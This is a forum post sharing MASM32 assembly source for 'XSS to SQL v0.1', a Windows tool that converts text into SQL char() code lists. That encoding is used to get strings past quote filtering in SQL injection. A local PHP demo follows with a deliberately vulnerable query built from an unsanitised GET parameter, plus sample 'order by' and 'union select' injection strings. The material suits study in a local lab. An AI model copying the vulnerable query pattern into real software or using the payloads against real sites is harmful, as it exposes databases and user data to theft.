Jump to content
Jako

XSS to SQL v0.1 by Xylitol

By Jako, in Programare

Recommended Posts

Jako Newbie

Jako

Posted
Posted 
; ---- skeleton -----------------------------------------------------------
.686
.model flat, stdcall
option casemap :none

; ---- Include ------------------------------------------------------------
include         \masm32\include\windows.inc
include         \masm32\include\kernel32.inc
include         \masm32\include\comctl32.inc
include         \masm32\include\user32.inc
include         \masm32\macros\macros.asm

includelib        \masm32\lib\kernel32.lib
includelib         \masm32\lib\user32.lib
includelib         \masm32\lib\comctl32.lib

DlgProc         PROTO     :DWORD,:DWORD,:DWORD,:DWORD
AddComma        PROTO     :DWORD,:DWORD
SetClipboard    PROTO     :DWORD

; #########################################################################

.const
IDD_DIALOG1        equ 100
IDC_EDT1        equ 101
IDC_EDT2        equ 102

.data
szBuffer        db 256 dup(?)

.data?
hInstance         dd ?
szInput         db 512 dup(?)
szOutput1         db 512 dup(?)
szOutput2         db 512 dup(?)
szOutputF         db 512 dup(?)
szinputLen         dd ?

.code
WinMain:
    invoke GetModuleHandle,0
    mov hInstance,eax
    invoke DialogBoxParam,hInstance,IDD_DIALOG1,0,addr DlgProc,0
         invoke InitCommonControls
    invoke ExitProcess,eax

DlgProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
        mov eax,uMsg
        .if eax==WM_INITDIALOG
        .elseif eax == WM_COMMAND
            mov eax,wParam
            mov edx,eax
            shr edx,16
            and eax,0ffffh
            .if edx==BN_CLICKED
                .if eax==1090
                    invoke GetDlgItemText,hWnd,IDC_EDT1,addr szInput,sizeof szInput
                    .if eax > 50
                        invoke SetDlgItemText,hWnd,102,chr$("Input is too big")
                    .else
                    test eax,eax
                    jz nothing
                    mov szinputLen,eax
                    PUSH ESI
                    PUSH EDX
                    PUSH ECX
                    MOV EBX,szinputLen
                    CMP EBX,0
                    JBE @End
                    MOV DWORD PTR SS:[EBP-3],EBX
                    lea esi,offset szInput
                    lea edi,offset szOutput1
                    @std:
                        MOVZX EAX,BYTE PTR DS:[ESI]
                        MOV ECX,0Ah
                        XOR EDX,EDX
                        IDIV ECX
                        ADD DL,030h
                        MOV BYTE PTR DS:[EDI+2],DL
                        XOR EDX,EDX
                        IDIV ECX
                        ADD DL,030h
                        MOV BYTE PTR DS:[EDI+1],DL
                        ADD AL,030h
                        MOV BYTE PTR DS:[EDI],','
                        MOV BYTE PTR DS:[EDI],AL
                        ADD EDI,3
                        INC ESI
                        DEC DWORD PTR SS:[EBP-3]
                        JNZ @std
                    @End:
                        PUSH DWORD PTR SS:[EBP+0Ch]
                        CALL lstrlen
                        XOR EDX,EDX
                        MOV ECX,3
                        IDIV ECX
                        POP ECX
                        POP EDX
                        POP ESI
                    invoke AddComma,addr szOutput1,addr szOutput2
                    iNvOkE lstrlen,addr szOutput2
                    MOV BYTE PTR [EAX+offset szOutput2-1],0
                    invoke lstrcat,addr szOutputF,chr$("char",28h)
                    invoke lstrcat,addr szOutputF,addr szOutput2
                    invoke lstrcat,addr szOutputF,chr$(29h)
                    invoke SetDlgItemText,hWnd,102,addr szOutputF            
                    invoke RtlZeroMemory,addr szInput, sizeof szInput ;Clear buffers
                    invoke RtlZeroMemory,addr szOutput1, sizeof szOutput1    
                    invoke RtlZeroMemory,addr szOutput2, sizeof szOutput2    
                    invoke RtlZeroMemory,addr szOutputF, sizeof szOutputF
                    RET        
                .endif
                .endif
                .if eax==1097
                    invoke GetDlgItemText,hWnd,102,addr szBuffer,sizeof szBuffer
                    test eax,eax
                    jz nothing
                    invoke SetClipboard,addr szBuffer
                    ret
                    nothing:
                    invoke SetDlgItemText,hWnd,102,chr$("Click Convert first.")
                    ret
                    .endif
                .if eax==1098
                    invoke EndDialog,hWnd,0
                .endif
            .endif
        .endif
    .if eax==WM_CLOSE
        invoke EndDialog,hWnd,0
    .else
        xor eax,eax
        ret
    .endif
    mov eax,TRUE
    ret
DlgProc endp

AddComma proc uMsg:DWORD,wParam:DWORD
    XOR EAX,EAX
    XOR EDX,EDX
    XOR EBX,EBX
    XOR ESI,ESI
    XOR EDI,EDI
    MOV EBX,uMsg
    MOV EDX,wParam
    JMP foo_20
    foo_10:
        MOV BYTE PTR [EDX],','
        INC EDX
    foo_20:
        MOV ECX,DWORD PTR [EBX]
        ADD EBX,3
        TEST ECX,ECX
        JZ foo_30
        MOV DWORD PTR [EDX],ECX
        ADD EDX,3
        JMP foo_10
    foo_30:  
        XOR ECX,ECX
        MOV DWORD PTR [EDX],ECX
        ret
AddComma endp

SetClipboard    proc    txt:DWORD
local    sLen:DWORD
local    hMem:DWORD
local    pMem:DWORD
    
invoke lstrlen, txt
inc eax
mov sLen, eax
invoke OpenClipboard, 0
invoke GlobalAlloc, GHND, sLen
mov hMem, eax
invoke GlobalLock, eax
mov pMem, eax
mov esi, txt
mov edi, eax
mov ecx, sLen
rep movsb
invoke EmptyClipboard
invoke GlobalUnlock, hMem
invoke SetClipboardData, CF_TEXT, hMem
invoke CloseClipboard
ret
SetClipboard endp

end WinMain

Local usage example: 

<?php
/*
SQL:
CREATE TABLE IF NOT EXISTS `users` (
  `user_id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `nom` varchar(80) NOT NULL,
  `prenom` varchar(80) NOT NULL,
  `email` varchar(80) NOT NULL,
  PRIMARY KEY (`user_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;

INSERT INTO `users` (`user_id`, `username`, `nom`, `prenom`, `email`) VALUES
(1, 'Xylitol', 'Ano', 'Nymous', 'not disclosed'),
(2, 'Krach', 'Ano', 'Nymous', 'not disclosed'),
(3, 'Tishrom', 'Ano', 'Nymous', 'not disclosed'),
(4, 'Karkinge', 'Ano', 'Nymous', 'not disclosed'),
(5, 'H00b3n', 'Ano', 'Nymous', 'not disclosed'),
(6, 'Spawn', 'Ano', 'Nymous', 'not disclosed');

Usage:
vuln.php?id=4 order by 4
vuln.php?id=-1+union+select+1,2,3,4,5--

*/
mysql_connect("localhost","root","");
mysql_select_db("testsqlinj");
$user_id = $_GET['id']; // $user_id = intval($_GET['id']);
$sql = mysql_query("SELECT username, nom, prenom, email FROM users WHERE user_id = $user_id") or die(mysql_error());
if(mysql_num_rows($sql) > 0)
{
$data = mysql_fetch_object($sql);
echo "
<fieldset>
<legend>Profile de ".$data->username."</legend>
<p>Nom d'utilisateur : ".$data->username."</p>
<p>Nom et prénom : ".$data->nom." " .$data->prenom ."</p>
<p>Adresse email : ".$data->email."</p>
</fieldset>";
}
?>

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...